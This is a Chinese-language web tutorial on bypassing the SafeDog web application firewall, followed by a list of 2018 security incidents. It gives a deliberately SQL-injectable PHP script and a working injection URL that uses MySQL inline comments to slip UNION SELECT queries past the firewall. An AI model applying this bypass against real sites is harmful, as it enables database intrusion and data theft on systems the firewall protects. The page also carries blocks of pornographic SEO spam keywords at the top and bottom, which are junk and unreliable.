<em id="0a85b"><option id="0a85b"></option></em>

<abbr id="0a85b"></abbr>

      <nobr id="0a85b"></nobr>
        <tr id="0a85b"></tr>
        9久久伊人精品综合,亚洲一区精品视频在线,成 人免费va视频,国产一区二区三区黄网,99国产精品永久免费视频,亚洲毛片多多影院,精品久久久无码人妻中文字幕,无码国产欧美一区二区三区不卡
        學習啦 > 學習電腦 > 電腦安全 > 網絡安全知識 >

        如何繞過安全狗防護軟件

        時間: 加城1195 分享

          網絡安全是目前互聯網的熱門話題之一,作為個人用戶的我們同樣需要關注,做好防護。安全狗是一款大家熟悉的服務器安全加固產品,據稱已經擁有50W的用戶量。最近經過一些研究,發現安全狗的一些防護功能,例如SQL注入、文件上傳、防webshell等都可以被繞過,下面為大家一一介紹。

          方法步驟

          本次測試環境為

          中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72

          網站安全狗IIS版3.2.08417

          SQL注入繞過

          我們先寫一個存在SQL注入漏洞的php:

          $uid = $_REQUEST['id'];

          if(!$conn = @mysql_connect("localhost", "root", "123456"))

          die('An Error Occured

          unable to connect to the database.');

          if(!@mysql_select_db("supe",$conn))

          die("An Error Occured

          unable to find it at database on your MySQL server.");

          $text = "select * from supe_members where uid=".$uid;

          $rs = mysql_query ($text,$conn);

          while($rom = mysql_fetch_array($rs))

          {

          echo $rom["username"];

          }

          ?>

          我用的是supesite的庫,可以看到這里是有明顯SQL注入漏洞的,當沒有安全狗的時候可以成功注入:

          當安裝安全狗之后,注入語句會被攔截:

          經過測試發現,安全狗這塊的匹配正則應該是\s+and這類的,所以只要想辦法去掉空格,用普通注釋/**/是不行的,安全狗也防了這塊。但是對內聯注釋/*!and*/這種不知道為什么安全狗沒有攔截。

          用下面語句成功繞過SQL注入過濾:

          http://192.168.200.115/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17

          有人說只有POST才可以,但是我測試最新版本的安全狗GET注入也是可以用這種方法繞過的。

          相關閱讀:2018網絡安全事件:

          一、英特爾處理器曝“Meltdown”和“Spectre漏洞”

          2018年1月,英特爾處理器中曝“Meltdown”(熔斷)和“Spectre” (幽靈)兩大新型漏洞,包括AMD、ARM、英特爾系統和處理器在內,幾乎近20年發售的所有設備都受到影響,受影響的設備包括手機、電腦、服務器以及云計算產品。這些漏洞允許惡意程序從其它程序的內存空間中竊取信息,這意味著包括密碼、帳戶信息、加密密鑰乃至其它一切在理論上可存儲于內存中的信息均可能因此外泄。

          二、GitHub 遭遇大規模 Memcached DDoS 攻擊

          2018年2月,知名代碼托管網站 GitHub 遭遇史上大規模 Memcached DDoS 攻擊,流量峰值高達1.35 Tbps。然而,事情才過去五天,DDoS攻擊再次刷新紀錄,美國一家服務提供商遭遇DDoS 攻擊的峰值創新高,達到1.7 Tbps!攻擊者利用暴露在網上的 Memcached 服務器進行攻擊。網絡安全公司 Cloudflare 的研究人員發現,截止2018年2月底,中國有2.5萬 Memcached 服務器暴露在網上 。

          三、蘋果 iOS iBoot源碼泄露

          2018年2月,開源代碼分享網站 GitHub(軟件項目托管平臺)上有人共享了 iPhone 操作系統的核心組件源碼,泄露的代碼屬于 iOS 安全系統的重要組成部分——iBoot。iBoot 相當于是 Windows 電腦的 BIOS 系統。此次 iBoot 源碼泄露可能讓數以億計的 iOS 設備面臨安全威脅。iOS 與 MacOS 系統開發者 Jonathan Levin 表示,這是 iOS 歷史上最嚴重的一次泄漏事件。

          四、韓國平昌冬季奧運會遭遇黑客攻擊

          2018年2月,韓國平昌冬季奧運會開幕式當天遭遇黑客攻擊,此次攻擊造成網絡中斷,廣播系統(觀眾不能正常觀看直播)和奧運會官網均無法正常運作,許多觀眾無法打印開幕式門票,最終未能正常入場。

          五、加密貨幣采礦軟件攻擊致歐洲廢水處理設施癱瘓

          2018年2月中旬,工業網絡安全企業 Radiflow 公司表示,發現四臺接入歐洲廢水處理設施運營技術網絡的服務器遭遇加密貨幣采礦惡意軟件的入侵。該惡意軟件直接拖垮了廢水處理設備中的 HMI 服務器 CPU,致歐洲廢水處理服務器癱瘓 。

          Radiflow 公司稱,此次事故是加密貨幣惡意軟件首次對關鍵基礎設施運營商的運營技術網絡展開攻擊。由于受感染的服務器為人機交互(簡稱HMI)設備,之所以導致廢水處理系統癱瘓,是因為這種惡意軟件會嚴重降低 HMI 的運行速度。


        服務器安全相關文章:

        1.服務器維護安全策略

        2.服務器安全維護技巧

        3.Linux 服務器提高安全性的技巧方法

        4.有哪些方法可以提高Linux服務器安全性

        5.教你如何配置自己的網站服務器

        4040983 主站蜘蛛池模板: www射我里面在线观看| 国产亚洲精品VA片在线播放| 九九热爱视频精品视频| 国产av一区二区亚洲精品| 一区二区中文字幕久久| 亚洲VA成无码人在线观看天堂| 少妇激情av一区二区三区 | 无码人妻精品一区二区三区蜜桃| 中文字幕在线观看一区二区| 青青草成人免费自拍视频| 亚洲国产精品区一区二区| 亚洲欧美人成电影在线观看| 久久天天躁综合夜夜黑人鲁色| 欧美日本精品一本二本三区| 国产V片在线播放免费无码| 国产精品无码久久AV嫩草| 亚欧美闷骚院| 国产大学生自拍三级视频| 国产一区二区丰满熟女人妻| 成人午夜在线观看刺激| 日本久久一区二区三区高清| 色综合五月伊人六月丁香| 亚洲国产韩国欧美在线| 极品人妻少妇一区二区三区| 亚洲日本VA午夜在线电影| 国产自产一区二区三区视频| 日韩中文字幕亚洲精品一| 亚洲精品综合一区二区在线 | 久久综合97丁香色香蕉| 乱人伦中文字幕成人网站在线| 国产老熟女国语免费视频| 亚欧美国产综合| 色综合天天操| 国产福利精品一区二区| 亚洲成人av在线高清| 亚洲 校园 欧美 国产 另类| 久久久久国产精品人妻| 蜜桃视频中文在线观看| 亚洲第一国产综合| 久久亚洲精品国产精品尤物| 九九在线精品国产|